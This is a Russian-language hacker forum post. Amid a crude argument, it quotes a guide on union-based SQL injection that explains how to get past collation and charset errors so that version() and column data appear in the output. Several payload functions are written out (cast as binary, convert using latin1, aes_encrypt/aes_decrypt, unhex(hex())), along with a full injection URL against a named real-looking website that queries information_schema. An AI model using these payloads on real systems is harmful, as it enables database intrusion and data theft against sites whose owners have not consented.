а причем тут кодировка я не понял? скобки и кодировка?никто не умничает...просто ты думай перед тем как бред и чушь всякую постить



для тех кто в танке

''Вопрос №2 Вот так выводит , а вот так невыводит.

site.com/index.php?id=1+union+select+1,2,3,4/*------------выводит

site.com/index.php?id=1+union+select+1,version(),3,4/*----невыводит

Господа, вывод у скули либо есть, либо нет, и если вы видите вывод цифры, но не видите версию или значние из столбца, то варианта 2 либо кодировка, либо тип данных не соответствует

Кодировка:

Может сопровождаться ошибкой такого плана:

Код:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT)

Бороться с этим можно несколькими способами, но все они сводятся к одному и тому-же. Что-бы получить данные в нужной нам кодировке можно пользоваться либо функциями приведения типов:

cast(Version()+as+binary)

CONVERT(Version(),binary)

convert(version()+using+latin1)

convert(version()+using+binary)

Либо шифровать/дешифровать данные. Результат при этом возвращается уже в "правильной" кодировке

aes_decrypt(aes_encrypt(Version(),1),1)

unhex(hex(version()))

пример, можете поэксперементировать с разными функциями:

http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,cast(version()+as+binary),3,4,5,6 ,7,8,9,10,11,12,13,14+from+information_schema.tabl es--

Несоответствие типа данных вам может встретится на БД отличных от MySql. MySql относится к типам данных достаточно лояльно, а вот другие БД в основном несоответствия не терпят. Если ваша база оказалась именно такой нужно ознакомится со статьями по проведению инъекций в Вашей базе. '' by Jokester

теперь еще раз повторюсь..причем вообще скобки с кодировкой?

можеш; попробовать в жопе пальцем ковырнутся что бы золото добыть, если ничего не получится это не значит что из за того что палец кривой...чуешь?